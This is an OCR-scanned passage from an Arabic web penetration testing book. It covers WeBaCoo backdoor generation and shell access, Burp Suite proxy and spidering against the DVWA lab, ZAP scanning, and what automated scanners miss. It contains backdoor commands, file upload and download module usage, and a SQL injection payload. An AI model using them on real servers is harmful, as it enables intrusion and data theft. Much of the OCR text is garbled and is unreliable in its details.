باستخدام اتصال مشفر كمحاولة لتجاوز أنظمة كشف ومنع التطلفل |۶۶٥‏ 
5 همه والجدار الناري 


التعليمة التالية تظهر الخيارت المتاحة 


:~# webacoo -h 


WeBaCoo 0.2.3 


: webacoo.pl [options] 


Generate backdoor code (-o is required) 


-f FUNCTION PHP System function to use 
FUNCTION 
: System (default) 
: shell_exec 
: exec 
: passthru 
: popen 


-o0 OUTPUT Generated backdoor output filename 


-۳ Return un-obfuscated backdoor code 


يمكننا خلق ٣0ههاعهط‏ باستخدام التعليمة التالية: 
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:~# webacoo -g -o test .php 


wWweBaCoo 0.2.3 


[+] Backdoor file "test.php" created. 


الآن يجب أن نرفع هذا الملف إلى السيرفر المخترق ومن ثم الاتصال 
بالسيرفر باستخدام التعليمة التالية 


:~# webacoo -t -U http://127.0.0.1/test .php 


WeBaCoo 0.2.3 


[+] Connecting to remote server aS... 
uid=33(www-data) gid=33(www-data) groups=33(www-data) 


[*] Type 'load' to use an extension module. 
[*] Type ':<cmd>' to run local OS commands . 
[*] Type 'exit' to quit terminal . 


الآن يمكننا كتابة <ه٨ء>‏ ومن ثم كتابة تعلميات داخل السيرفر 


$ <cmd> 
E 


E 
test .php 
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كما يمكننا كتابة ١ه٠!ا‏ من أجل عرض الخيارات المتاحة 


; Load 
Currently available extension modules : 
o MySQL -CLI: MySQL Command Line Module 
mysql -cli <IP(:port)> <user> <pass> ex. 'mysql-cli 10.0.1.11 admin pAsS') 


PSQL -CLI: Postgres Command Line Module 
psql -clil <IP( :port)=> <db> <user> <pass> (ex. 'psql-cli 10.0.1.12 testDB root pAsS') 


Upload: File Upload Module 


upload <local_file> <remote_dir> ax. 'upload exploit.c /tmp/') 


Download: File Download Module 
download <remote_ file> (ex. 'download config.php ' ) 


Stealth: Enhance Stealth Module 
stealth <webroot dir> (ex. 'stealth /var/www/html ' ) 


[*] Type the module name with the correct args. 


كما تلاحظ يمكننا تحميل أو رفع ملفات إلى السيرفر. 
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" كيفية عبور البيانات عند استخدام ويب بروكسي 


Burp Suite " 
Zed Attack Proxy (ZAP) " 
Acunetix " 


The only truly secure system is one that is 
powered off, cast in a block of concrete and 
sealed in a lead-lined room with armed guards 
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مقدمة: 


مرحلة الاستطلاع والفحص لتطبيق الويب تومن تفاصيل ومعلومات حول 
المصادر مثل (الصفحات والملفات والمجلدات والروابط والصون المكونة 
لتطبيق الويب, هناك أجزاء مهمة جداً من المعلومات التي يمكن أن 
تستخدم خلال عملية استغلال تطبيق الويب لاحقاً. 

القيام بعملية استطلاع تطبيق الويب تتضمن اكتشاف كل مصدر يتفاعل 
معه التطبيق, فقط المصادر التي تم اكتشافها خلال عملية الاستطلاع 
سوف يتم فحصها لذلك من المهم جداً أن تجد أكبر عدد ممكن من 
المصادر, الأدوات المستخدمة في عملية استطلاع تطبيق الويب تتضمن 

* بروکسی اعتراض لکشف کل طلب ۸۲۲۴/۶8 مرسل من المتصفح 
وكل إجابة يتم إرسالها من تطبيق الويب. 

t00 *‏ وderinامء‏ لجعل الطلبات بشكل أتوماتيكي لتطبيق الويب 
لذلك لن تكون مضراً لاعتماد على الطلب بشكل يدوي لكل 
المصادر الموجودة. 

١‏ باحث عن تغرات مخصص لتطبيقات الويب للبحث في المصادر 
المكتشفة لتحديد الثغرات. 
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أداة وہciاfo‏ uteاb‏ لاکتشاف المجلدات الأکثر استخداماً في 
تطبيق الويب والتي يمكن أن تكشف المزيد من المصادر. 


| 0 للاع و ۹1 o‏ اف 0 انين الويب: 


هناك عدة طرق للقيام بعملية استطلاع تطبيق الويب من أجل إيجاد كل 
المصادر لتتمكن من فهم كيف يعمل التطبيق لتحديد أفضل طريقة 
للاستغلال والتي تتضمن: 
« أماكن الملفات المدخلة (دخل ملفات ا۳۲۸1 مثل صيغة الملفات 
والملفات المخفية. وصناديق القوائم المنسدلة g drop-down‏ 
تقpÛlg‏ Jlاخlıiر (radio button‏ 


iتlبlhطg‎ HTTP cookies jqsgSllg HTTP headers ٽIıggرi فحص‎ " 
URL 

٠‏ تتبع بارامترات ۴0S١‏ هه ا۸ل لرؤية كيف يتفاعل التطبيق مع 
قاعدة البيانات. 

٠‏ القيام بمراجعة تشغیل tما٣ va Sc‏ ھل and‏ اګ في جانب 
المستخدم. 


بالتأكيد هذه الخطوات مهمة جداً إذا كنت تريد الحصول على فهم 


عميق لتطبيق الويب الهدف ولكنها تتطلب فترة طويلة من الوقت 


والمهارات ومعرفة بالبرمجة, لن أقوم بشرح كل هذه الخطوات في هذا 
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الکتاب سوف ارکز فقط على التغرات التي يمكن اكتشافها واستغلالها 
بسهولة باستخدام بعض الأدوات المتوفرة بشكل مجاني. 

سوف نقوم بعملية الاستطلاع باستخدام كامما ومiامهامء‏ التي يمكن 
يتم إعدادها اتعمل بشكل آتوماتيكي أو بشكل يدوي لاكتشاف المصادر 
في تطبيق الويب الهدف, المصادر المكتشفة خلال عملية الاستطلاع 
سوف تستخدم في عملية الفحص للبحث عن الثفرات في تطبيق الويب 
بشكل مشابه لطريقة البحث عن الثغرات في سيرفر الويب. 


أساسیات بروکسی الويب: 


أول عمل يجب أن تكون على معرفة تامة به في عملية اختبار اختراق 
الويب هو إعداد البروكسي ليعمل في متصفحك ويجب أن تفهم ماذا 
يحدث عند استخدامك بروكسي عند تفاعل بين متصفحك وتطبيق الويب. 


في البداية سنقوم بتعريف العمل الذي يقوم به المتصفح (المستخدم) 
وتطبيق الويب (السيرفر) ملابين المرات في اليوم, المتصفح يرسل 
طلبات إلى تطبيق الويب والتطبيق يرد بإرسال الإجابات إلى المتصفح 
هذه الدورة تتم خلال استخدامنا للإنترنت. 
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البروكسي يسمح لك برؤية كيف تعمل هذه الدورة من طلبات وإجابات 
لأن البروكسي يكون بين المتصفح وتطبيق الويب ويتحكم بتدفق 
البيانات من الطلبات والإجابات التي تمر عبره كما في الشكل التالى 


ل 


Browser Web application 
(client) (server) 


Response 


عندما تقوم بإعداد البروكسي الخاص بك ستصبح قادر على فحص كل 
طلب وكل إجابة تمر من خلاله ويمكنك اعتراض وتغيير قيم البارامترات 
المستخدمة فى هذه العملية, وهذه المهمة عملية جداً في استغفلال 
تطبيقات الويب. 


استخدام آخر لبروكسي الويب هو لحف تاريخ أو لفهرست كل الطلبات 
والإجابات التي تمر من خلاله. الطلبات لا تتداخل مع الإجابات وهذا 
يسمد لنا بفحصها لاحقاً خلال عملية الفحص من أجل استغلالها. 


:Burp Suite 


سوف نستخدم Burp Suite‏ او (مr‌Bu‏ بشکل مختصر) کبروکسي خاص 
بنا وهو موجود بنظام كالي بشكل تلقائي ولن تكون بحاجة لتحميله. 


سوف نستخدم عدة آدوات في Suite‏ ماں8 خلال عملية الاختراق 
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favorite bar jo Burp J JgصgلJا يمكن‎ 


يمكن أن يأخذ عدة ثواني أول مرة ليقوم بعملية التحميل لذلك كن 


صبوراً 
:Burp Proxy lel‏ 


من أجل الحصول على کل طلبات وإجابات ۸۲۲۴/8 يجب أن تقوم بإعداد 
متصفحك لاستخدام بروكسي من خلال الخطوات التالية: 


١‏ قم بفتح المتصفح اeمsئaمwءءا‏ ثم اختر 
Preferences >> Advanced >> setting‏ 


Preferences ~ Iceweasel © © o0 
Welcome :: Damn Vul... * / ¥ Preferences * 


¢ | O Iceweasel | about:preferences#advanced vC |Asa RIO ¥ f Or 


EI Most Visited Offensive Security $ Kali Linux $ Kali Docs $ Kali Tools ® Exploit-DB Aircrack-ng 


@ camer! Advanced 
Q Search 
General Network Update Certificates 

® Content 
4A Applications Connection 
vo Privacy Configure how Iceweasel connects to the Internet Settings... 
8 Security Cached Web Content 

Your web content cache is currently using 101 MB of disk space Clear Now 


€) sync 


Override automatic cache management 
J Advanced Limit cache t 50 MB of space 


Offline Web Content and User Data 


Your application cache is currently using O bytes of disk space Clear Now 


¥ Tellme when a website asks to store data for offline use Exceptions... 


The following websites are allowed to store data for offline use: 
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٣‏ تم Manual Proxy Configuration iil‏ وأدخJ‏ العنوان التالي 


127.0..1 و 8080 اام و امسح دخل الصندوق 
NO Proxy For‏ 


Connection Settings 


Configure Proxies to Access the Internet 
O No proxy 
O Auto-detect proxy settings for this network 
O Use system proxy settings 
@ Manual proxy configuration: 


HTTP Proxy: | 127.0.0.1 Port: 8080 | 
[ J Use this proxy server for all protocols 
SSL Proxy: | Port: | 0 E 
FTP Proxy: | Port: O0 E 
SOCKS Host: | E. 0 
O SOCKS v4 ® SOCKS v5 | Remote DNS 
No Proxy for: 
Example: .mozilla.org, .net.nz, 192.168.1.0/24 
O Automatic proxy configuration URL: 
Reload 


lI Do not prompt for authentication if password is saved 


| Help Cancel | OK 


اختبار اختراق سيرفرات وتطبيقات الويب 


:Spidering With Burp 
الآن أصبح متصفحك فعد ليستخدم ما8 كبروكسيء» يمكننا البدء‎ 
بعملية استطلاع تطبيق الويب.‎ 


pide ring‏ هو عمل فهرسة لكل مصادر تطبيق الويب وتصنيفها 
من أجل استخدامها لاحقاً من خلال القيام بعملية وہااسهءء لكامل 
تطبيق الویب. 

السؤال هو أي طريقة سوف نستخدم اليدوية أو الاتوماتيكية وماهي 
الفائدة من كل طريقة. 


عملية الاختيار تعتمد على أهدافك. 


:Automated Spidering 

هذه العملية تتم بأخذ أي عنوان ا۸ل وإيجاد وطلب الروابط بشكل 
أتوماتيكي والقيام بأي عمل مسموح به حتی لو كان عمل حساس مثل 
تسجيل الخروج أو تغيير كلمة السر أو القيام بعملية التحديث أو ما 
يشابه ذلك, هذا البحث يحدث بشكل تكراري إلى أن لا يتم اكتشاف أي 
جديد ويتم تخزين خريطة للموقع لتصنيف المصادر. 
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مدی وہ automated spider‏ عادتاً ما یکون للمستوی الأعلی ل URL‏ 
لتطبيق الويب الذي تقوم بجمع المعلومات عنه, المهاجمون لا يقومون 
عادتا باستخدام ٣٥لامs automated‏ على الهدف بسبب الكمية الكبيرة 
من الطلبات التي سيتم إرسالها إلى السيرفر. 

أي مدير شبكة حتى لو كان قليل الخبرة يمكنه ملاحظة تدفق الطلبات 
من نفس عنوان ۱۴ ومعرفة أن شخص ما يقوم بعملية استطلاع على 
تطبيق الويب. 

:Manual Spidering 

ویسمیى أيضاً ideringمsp‏ assiveم‏ ویتم بالاعتماد علی بعض الأفعال 
من قبل المهاجم باستخدام المتصفح وذلك لبناء خريطة للموقع الذي 
يراد جمع المعلومات عنه. ويتم ذلك باستخدام متصفح عادي مع 
بروکسي. 

ideringمs‏ اManua‏ يحافظ على السرية خلال عملية الاستطلاع, معدل 
الطلبات يتم ضبطه بحسب سرعتك بالضغط على الروابط في تطبيق 


الويب وبالتأكيد لن يكون هناك أي إنذار ينبه مدير سيرفر الويب. 
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تJıtw :Burp Spider‏ 
استخدام Burp Spider‏ بشکل يدوي ضد 0۷۷۸4 يتم بالخطوات التالية: 


.١‏ قم بتشغيل ما8 كما في الخطوات السابقة 

'. قم بإعداد متصفح الانترنت لاستخدام بروكسي واستخدم القيمة 
الافتراضية 127.0.0.1 والبورت 80 

.٣‏ ادخل العنوان التالي في متصفح النت للوصول إلى صفحة 


الدخول فی 0۷۷۸ 
http://127.0.0.1/dvwa‏ 


إذا لم يقم م٣نا8‏ باعتراض كل الطلبات بشكل تلقائي قم بالضفغط على 
وام من الشریط العلوي ثم اختر اممء٣مام‏ من الشريط العلوي 
الفرعي ثم اضغط عل intercept is on aڊnül intercept is off‏ 


Burp Suite Free Edition v1.5 Output: Muted 
۴ Burp Intruder Aepeater Window Help Sulit n Audio Ana 3 Steere 
Target j Proxy j Spider | Scanner | intruder jİ Repeater | Sequencer | Decoder | Comparer pbons rts 


Intercept is on 
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قم بالضغط علی ۹٣امسw٣ہ]‏ ليتم تمرير الطلب 


Burp Suite Free Edition v1.6.31 © O 0 
Burp Intruder Repeater Window Help 
Target | #0 | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender |j Options | Alerts 
lniereepî | HTTP history | WebSockets history | Options 
54 Request to http://127.0.0.1:80 
| Forward | Drop | | Intercept is on Action 185 12 
Raw | Params | Headers | Hex 
POST /dvwa/login.php HTTP/1.1 4 
Host: 127.0.0.1 
User-Agent: Mozilla/5.O0 (Xll; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0 
Accept: text/html, application/xhtml+xml,application/xml ; q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http: //127.0.0.1/dvwa/login. php 
Cookie: security=impossible; PHPSESSID=jsde3gbnlé6l68199ncdnfacreS 
Connection: keep-alive 
Content-Type: application/x-www- form-urlencoded 
Content-Length: 88 
username=admin&password=password&Login=Login&user_token=d820745691442e9bd4b f68394 f f4aleS 
۲ 
ےا ےا ےا کے‎ earch te 0 matches 


؛. قم بالدخول إلى 0۷/W۸4‏ باستخدام اسم المستخدم ai”‏ 
gکlلnمã‏ lل۸wuرj password‏ 
ماBu‏ الآن يقوم بتصنيف وفهرسة كل طلب تقوم به وكل إجابة من 


تطبيق الويب 0۷۷۸4 وهذا يكون على شكل شجرة كخريطة للموقع 
يقوم مد8 ببناءها بشكل آتوماتيكي كما في الشكل التالي: 
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Burp Suite Free Edition v1.6.31 ww 


Burp Intruder Repeater Window Help 


[Target | Proxy Spider | Scanner j Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 


Filter: Hiding not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders | 


[ http://127.0.0.1 1 Host | Method | URL | Params | Stat... 4| Length | MIME type | Title 


Y Wî duwa 
Û about php http://127.0.0.1 GET  /dvwallogin.php O0 200 1895 HTML Login :: D 
٤ http://127.0.0.1 GET /dvwa/about. php a HTML 
index.php 1 GET / ۷ 0O script 
0 Instructions php 3 GET /dvwaf/instructions.php 0 HTML 
Û login.php 0.1 GET / /logout. php O0 HTML 
DB E ۴ 0.1 GET [phpinfo.php a HTML 
ÛD phpinfo.php 1 GET ecurity.php O HTML 
DB EEUNYy php 1 GET etup. php 8 HTML 
Û setup.php 1 GET ulnerabilities O HTML 
۰ 7 0.0.1 GET / /vulnerabilities O HTML 
> http://hiderefer.com 
> nttp://sourceforge.net و‎ . 
* @l https://www.apachefriends. org [Response | 
> http://www. dvwa. co. uk 1 BSS Response 
ttp://www.irongeek. com _[Ren Params | Headers | Hex 
> nttp://www.itsecgames.com 
» @l https://www.owasp.org GET /dvwa/index.php HTTP/1.1 
> ۾‎ yww. virtualbox. org Host: 127.0.0.1 
» Ol https://www.vmware.com User-Agent: Mozilla/5.O0 (Xll; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 
> http://www. W3. org Iceweasel/38. 5.0 


Accept: text/html, application/xhtml+xnml, application/xml ; q=0.9,*/*;q=0.8 
Accept-Language: en-US,en; q=0. 5 

Accept-Encoding: gzip, deflate 

Cookie: security=impossible; PHPSESSID=jsde3gbnlé6l68199ncdnfacreSs 
Connection: keep-alive 


الآن هو الوقت المناسب لضبط المدى ممهءء لمحاولة اختبار الاختراق 
في مBurp‏ حیث پمکنك ان تشیر إلى عنوان or ۱P address‏ اRل‏ الذي 
ترید اعتباره کھدف وسیتم اجراء عملیة وہن۲ههامء له بشکل 
آتوماتیگی. 

في متالنا سوف نتضمن كل شيء على سيرفر الويب (أعهماهعها) لذلك 
سوف نقوم بضبط 127.0.0.1 لیکون مم٥ءء‏ من خلال الضغط بالزر 


اليميني للماوس على هه٥٣‏ في الشجرة الخاصة ب 127.0.0.1 واختيار 


add item to scope‏ وسیتم إرسال کامل الموقع لیکون داخل ممهعء 
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J Taro Î Pree 


_| Se mee | Scope 


Nter ding not found tems. hiding C35, image ané general binary ceornbest hiding Aus renponsen. hiding empty folders 
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يمكنك أن تضیف أکثر من عنوان تطبیق ویب لیکون في مدی ممهءء 
اختبار الاختراق لديك, لترى م٠مهءء‏ الحالي لديك اضغط على مممءء من 
الشريط العلوي الفرعيء يمكنك الضغط على المجلدات لفتحها ورؤية 
الصفحات التي وجدها م٣8‏ داخلها, الأيقونة المسننة تستخدم لإشارة 
للصفحات التي تملك وظائف إضافية مبنية في داخلهاء في معظم 
الأحيان هذه الصفحات تستخدم بارامترات لتأدية أعمال مثل تسجيل 
الدخول أو إعداد قاعدة البيانات أو استدعاء البيانات وهذه الصفحات هي 
dynamic pages‏ 

أيقونة الصفحة البيضاء تستخدم لإشارة إلى صفحات الويب التي لا تقبل 


static web pages مدخلات وهي مجر‎ 
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خريطة الموقع تظهر المصادر التي تقوم بطلبها بشكل يدوي ويتم 
تصنيفها بواسطة البروكسي, بشكل افتراضي ٣عهامS؟S‏ م٣ Bu‏ يقوم 
بعملية فحص بشكل غير فعال صهةعءء رام۷اوئودم لكل الطلبات والاجابات 
اڄاHM‏ لکل الروابط, عملية ٣ەهامS‏ اليدوية (ssiveھم)‏ لن تطلب هذه 
المصادر بل ستقوم بتضمينها في خريطة الموقع. 

عندما تتصفح صفحات إضافية من 0۷۷۸4 فإن خريطة الموقع تستمر 
بإاضافتها داخل 127.0.0.1 ۷٣هاءعءdi‏ وتطبيقات الويب الخارجية المشار 
إليها من قبل ,0۷W۸‏ أنت لم تقم بتصفح هذه المواقع الخارجية 
ولكنها مشار إليها في صفحات 0۷۷۸4 التي قام متصفحك بطابها. 


تطبيقات الويب المرتبطة والمشار إليها هى جزء مهم من عملية 


عند استخدام وہنا مهامs‏ مssivوaم‏ إن لم تقم بزيارة كل صفحة في 
4 من أجل تضمينها في خريطة الموقع, وبأقل من 20 صفحة 
والتي لن تأخذ وقت طويل يمكن أن تحصل على خريطة كاملة للموقع 
لتطبيق الويب, بعدها يمكنك تحديد الصفحات و البارامترات لمهاجمتها, 
ولكن في التطبيقات الكبيرة جداً يمكن أن تضغط على روابط لساعات 
عديدة بدون ضمانة آنك في الحقيقة فتحت كل رابط ممكن, في هذه 
الحالة وإذا لم تكن قلق من السرية يمكنك استخدام automated‏ 


spider 
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يمكنك أيضاً اختيار أي فرع من تطبيق الويب الهدف أو كامل تطبيق 
الويب وذلك من خلال الضغط بالزر اليميني للماوس داخل قائمة عاأو 


spider this branch jlıiilg map 


قبل البدء بعملية ٣علامء automated‏ هناك بعض الإعدادات التي يجب 
مراجعتها من خلال ٣مه‌امء‏ من الشريط العلوي تم ءہه‌اامه من الشريط 
العلوي الفرعي کہا في الشكل التالي: 


Burp Suite Free Edition v1.6.31 ت‎ 


Burp Intruder Repeater Window Help 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder ً comparer Extender | Options | Alerts 


Control | Options 


(2) Crawler Settings 


J» 


These settings control the way the Spider crawls for basic web content. 


@ Check robots.txt 

O Detect custom "not found" responses 
@ Ignore links to non-text content 

A Request the root of all directories 


& Make a non-parameterized request to each dynamic page 


Maximum link depth: 5 


Maximum parameterized requests per URL: 50 


Passive Spidering‏ ك2 
Passive spidering monitors traffic through Burp Proxy to update the site map without making any new requests.‏ | 
Passively spider as you browse‏ @ 


Link depth to associate with Proxy requests: O0 


(2) Form Submission 


0 These settings control whether and how the Spider submits HTML forms. 


Individuate forms by: | Action URL, method and fields ( 


O Don't submit forms 
O Prompt for guidance 


© Automatically submit using the following rules to assign text field values: 


| Add | Enabled Match type | Field name | Field value 
A Reqex mail winter@example. com 4 
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Burp Suite Free Edition v1.6.31 aT 


Burp Intruder Repeater Window Help 


Target | Proxy Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options Alerts ) 
Control | Options 


(2) spider Status 


Use these settings to monitor and control Burp Spider. To begin spidering, browse to the target application, then right-click one or more nodes in the target site 
map. and choose "Spider this host / branch". 


Spider is running | Clear queues | 


Requests made: 172 
Bytes transferred: 881,224 
Requests queued: O0 


Forms queued: 0 


(2) Spider Scope 
[0) @ Use suite scope [defined in Target tab] 


O Use custom scope 


فحص تطبيق الويب: 


عملية فحص تطبيق الويب تؤمن طريقة أتوماتيكية لاكتشاف الثغرات 
في التطبيق بشكل مشابه ل usءءه.‏ الذي يقوم بإيجاد إعداد السيرفر 
الخاطئة أو الترقيعات المفقودة 

Web server misconfigurations and missing patches 

معظم أداوت البحث web appاication scanners‏ توضع بین المتصفح 
وتطبيق الويب مثل بروكسي الويب وهي جزء من مجموعة من الأدوات 
oمJû Burp Suite and ZAP‏ 


Web scanner‏ يرسل دخل مصنوع يدوياً إلى التطبيق ويحلل الإجابة 
من خلال تواقيع التغرات المعروفة, من اJlشÛilعٍ web scanner J‏ |رJlw‏ 
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مئات من الطلبات إلى حقل الدخل في تطبيق الويب لفحص كل الأنواع 
المختلفة من تواقيع التغرات. 
هناك نوعین ل web scan nes‏ یجب أن تعرفهما: 
Burp Suite scanner‏ 

Scanner in OWASP,s Zed Attack Proxy (ZAP) 
متوفر فقط بإصدار «sioامv هام والذي سعره حوالي‎ Burp Scanner 
Burp Scanner jÎ آثناء كتابة هذا الكتاب, الشيء الجید ھو‎ 0 
Z۸۴ وبالتالي يمكنك العمل مع‎ 24۴ S٣٣6۴ شبيه جداً بطريقة عمل‎ 
Burp Suite Pro cli gıطiwتi‎ jکت إِذا لم‎ 


انواع التغرات: 

هناك ثلاث أنواع رئيسة من ثغرات تطبيقات الويب بغض النظر عن الأداة 
التي تريد استخدامها للقيام بعملية الاختبار. 

Web scanner‏ مجهز لیقوم بتحدید الأمور التالية: 


تغرات الدخل ءeا†nerabiliاvu‏ based-utمnpا‏ من جانب السیرفر: 
مثل حقن تعليمات قواعد البيانات وحقن تعليمات نظام التشغيل 
SQL injection and operating system command injection‏ 

هذا النوع من التغرات في بعض الأحيان يكون صعب تحديده بطريقة 


إيجابية باستخدام ۴ءء امس لذن الإجابة من تطبيق الويب في غالب 
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الأحيان يتم إيقافها من جانب السيرفر. مثال كلاسيكي لاكتشاف ثفرة 
S۵) injection‏ حيث يتم إضافة اشارة تنصيص (') لعنوان ا)0 إذا رد 
التطبيق برسالة خطاً هذا يعني آنه مصاب بهذه الثغرة. 

Cross-site Scripting Ji تغرات الدخل من جانب المستخدم:‎ ١ 


(XSS) 
تستطیع تحدید هذا النوع من التغرات‎ web scanners معظم‎ 


بشکل موثوق لن الکود في جانب المستخدم هو مرئي. 

٠‏ التغرات التي يتم تحديها من خلال فحص دورة الطلب والإجابة بين 
المتصفح وتطبيق الويب مثل إرسال الكوكيز الغير محمية وكلمات 
السر الغير مشفرة. هذه الثفرات تستخدم لمهاجمة الهدف في 
كل من تطبيق الويب ومستخدم الويب. 
معظم web scanners‏ یمکنھا أن تکشف هذا النوع من الثغرات. 
الطلب من المتصفح والإجابة من تطبيق الويب تكون مرئية بشكل 
كامل من قبل الباحث ٣۴٣هعءء‏ لذلك فهو يحتاج فقط لتحليل 
ومقارنة النتائج. 


lio‏ ليس من الصعب فحص فيما إذا كانت بارامترات اسم المستخدم 
وكلمة السر ترسل بشکل غير محمي عبر 1۲١۳۲‏ 
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ما الذى لا يستطيع الباحث عن الثغرات إيجاده: 


Web appاication scanners‏ تملك عیب في أنواع التغرات التي یمکن 
إيجادها والتي في الواقع یجب أن تکون منتبهاً لها قبل استخدامك 
لهذه الأداة. 


هذه قائمة بتغرات تطبيقات الويب التي لا يمكن كشفها من قبل 
scanners‏ utomatedه‏ بغض النظر إذا كان مجاني ومفتوح المصدر أو 
کان غير مجاني 
٠‏ كلمات السر الضعيفة: بالرغم من أن ٣#هامء‏ سوف يحاول 
الدخول إلى التطبيق باستخدام الشهادات الافتراضية التي تقدم 
فقط من أجل إيجاد محتوى إضافي. في حالات نادرة ينجح تسجيل 
الدخول باستخدام الشهادات الافتراضية, الباحث لا يلاحظ أن السبب 
هو ضعف كلمة السر, لذلك حتى لو كان حساب المدير من السهل 
تخمينه فان الباحث لن يؤمن آي دلالة لهذه التغرة. 
٠‏ اسم البارامتر الذي له دلالة أو معنى: الباحث لا يملك ذكاء 
كافي ليعرف ماهي البارامترات التي لها معنى أو دلالة للتطبيق 
وماهي القيم المختلفة لهذه البارامترات حتى لو كان وسيلة 
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:Stores SQL !njection "‏ لأن هذا النوع من الثغرات نادراً ما يؤمن 
إجابة مباشراً تعود إلى الباحث فهي بصورة عامة تعتبر من الثغرات 
التي لا يتم كشفها من قبل الباحث وهي على العكس تماماً من 
8Q injection‏ التقليدية التي تؤمن رد أو إجابة فورية للباحث 
ليقوم بمقارنتها مع تواقيع الثغرات المعروفة لديه. في اسواً 
الأحيان الباحث يبلغ عن وجود ازم stored SQ)‏ ولكن النتيجة 
تكون سلبية وذلك بعد فترة طويلة من الوقت. 

٠‏ كسر التحكم بالوصول: القدرة على مهاجمة تقنية التحكم 
بالوصول لا يتم الإشارة إليها من قبل الباحث لأن الباحث لا يدرك 
الأمور عندما يقوم المستخدم بالوصول إلى مصادر مستخدم أخر أو 
عندما يكون المستخدم قادرا على الوصول إلى مصادر المدير وذلك 
لأن الباحث لا يستطيع أن يتخذ قرار منطقي ولا يدرك أبداً ما هي 
البارامترات والقيم التى يستخدمها تطبيق الويب في هذه 
المهمة. 

:Multistep Stored XSS *‏ تقریباً كل الثغرات التي تتطلب خطوات 
متعددة لا يتم كشفها من قبل الباحث لأنه لا يملك القدرة على 
فهم الخطوات المتسلسلة, مثلاً الباحث سوف يفشل في كشف 
تغرة ×5SS‏ ك١٥٣هاء‏ في الخطوة التالثة من عملية بحث في خمس 
خطوات لأنه لا يملك القدرة على إكمال أول خطوتين ليصل إلى 
صفحة الثفرة. 
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:Forceful Browsing (file and directory forcing) "‏ هذە التغرة 
تعرف باسم التصفح الجبري ولا يتم الإشارة إليها من خلال الباحث 
لأنها تتضمن طلبات متعددة لمصادر متشابه بشكل متتابع وتكون 
قادرة على فك التشفير. 
الباحث سوف يفشل في ذلك لأنه لا يستطيع أن يفهم حالة 
تشغيل التطبيق لكل المصادر المطلوبة. 

٠"‏ مهاجمة الجلسة: تغرات الجلسة مثل إرسال فعرف الجلسة عبر 
۴P‏ غير محمي. الباحث لن يدرك آنواع مهاجمة الجلسة مثل 
تثبيت أو ركوب الجلسة, كل هذه الأنواع من الهجمات تتضمن 
تفاعل بشري بين المهاجم والضحية وهي خارج مجال أي باحث 


.automated scanner يaيكيتاموتا‎ 
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الفحص باستخدام 

:ZED Attack Proxy (OWASP-ZAP) 

قبل الانتقال إلی Z2۸۴‏ یجب ان تفھم Suite‏ مإعںBu‏ بشکل جید کاا 
الأداتين تحتاجان لإعداد بروكسي في متصفحك 127.0.0.1 و البورت 
0 وهذه هي القيم الافتراضية, ويمكنك أيضاً تشغيل كلا الأداتين 
في نفس الوقت وذلك على بورتات مختلفة, 

۸۴ شبیه جداً ب مtاu‌S Burp‏ کلاھما یحویان عدة أدوات مثل 


Site map, intercepting proxy, spider and ability to 
encode/decode values 


عمل خريطة للموقع و بروكسي اعتراض و سبايدر وقدرة على تشفير 
وفك تشفير القيم ويحوي أيضاً على scanner‏ ortم‏ و الذي يمكن أن 
يستخدم خلال عملية استطلاع تطبيق الويب وأداة وا۴ لتسريع 
ارسال الدخل إلى التطبيق وأداة هجوم القوة الغاشمة directory‏ 
force‏ teاuاط‏ اتخمين أسماء المجلدات الشائعة والمعروفة في سيرفر 
الويب. 
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إعداد و 


عندما تفتد 24۴ لأول مرة ستظهر لك اتفاقية الرخصة ويجب عليك 
الموافقة عليها طبعاً يجب أن تقوم بإعداد البروكسي في متصفحك كما 
في gÎ Burp‏ يمكنك الضغط على kءة١۳-١-ونام‏ الذي سيقوم بتزويد 
متصفحك بإضافة تعمل على جعل المتصفح يستخدم عنوان البروكسي 
بشکل اتوماتیکی. 


قم بوضع عنوان ال الهدف في )ع هااa t٥‏ اUR1‏ واضغط علی زر 
Attack‏ وانتظر قليلاً حتى انتهاء العملية كما في الشكل التالي: 


Standard mode ww) |] & # & 2 $ 185 8 E 08 © I 0% û a a 9 
fOistes + | 4 Quick Start 2| =; Request 1 Responses 1 | 
ON&EG 
v îl Contexts Welcome to the OWASP Zed Attack Proxy (ZAP) 
(® Default Context ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. 
HS Please be aware that you should only attack applications that you have been specifically been given permission to test. 
Ru GET:dwwa 


To quickly test an application, enter its URL below and press 'Attack'. 
Fu # GET:robots.txt 


Fu # GET:sitemap.xml 
2 م‎ URL to attack: http://127.0.0.1/dvwa أ‎ @ select... 


” 8 Fu # dwa 
Fu # GET:login.php | 4 Attack 4ا‎ 
> E F Wdwa Progress: Attack complete - see the Alerts tab for details of any issues found 


Fu # POST:login.php(Login,password, user_toker) 
Fu # GET:dvwwa 


|] Fı # GET:dvwa(C) For a more in depth test you should explore your application using your browser or automated regression tests while proxying through ZAP. 


If you are using Firefox 24,0 or later you can use 'Plug-n-Hack' to configure your browser: 


Configure your browser: Plug-n-Hack 


Or point your browser at: http://localhost:8080/pnh/?apikey=foo833a9eotj1kt1le7f3upqpb 
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مشاهدة نتائج :Z۸۲‏ 


بعد انتهاء العملية يمكنك مشاهدة القائمة ءا١6اA‏ حيث تعرض التغرات 
المكتشفة, ليس من المفاجئ أن يكون 0۷۷۸4 الخاص بنا يحوي على 
العديد من التغرات. 

۴ يقدم شرح مختصر عن كل ثغرة كالصفحة التي تم اكتشاف الثغرة 
بها وما هي قيمة البارامترات التي وجدت كما في الشكل التالي الذى 


SQL injection öةرغت يعرض وجود‎ 


Ê History Î & search j FUAlerts 2 Output |j %% Spider j A Active Scan j 


O @ SQL Injection - MySQL 

v (FB Alerts (14) lal URL: http://127.0.0.1/dvwa/vulnerab 
* (î fu Cross Site Scripting (Reflected) Risk: Fu High 
* (® fu Path Traversal Confidence: Medium 
* (î Fë Remote File Inclusion (3) Parameter: id 


[Ê fF SQL Injection - MySQL Attack: ' UNION ALL select NULL -- 


[B GET: http://127.0.0.1/dwa/vulnerabilities/sqlir?ia= ESS The used SELECT statements h 
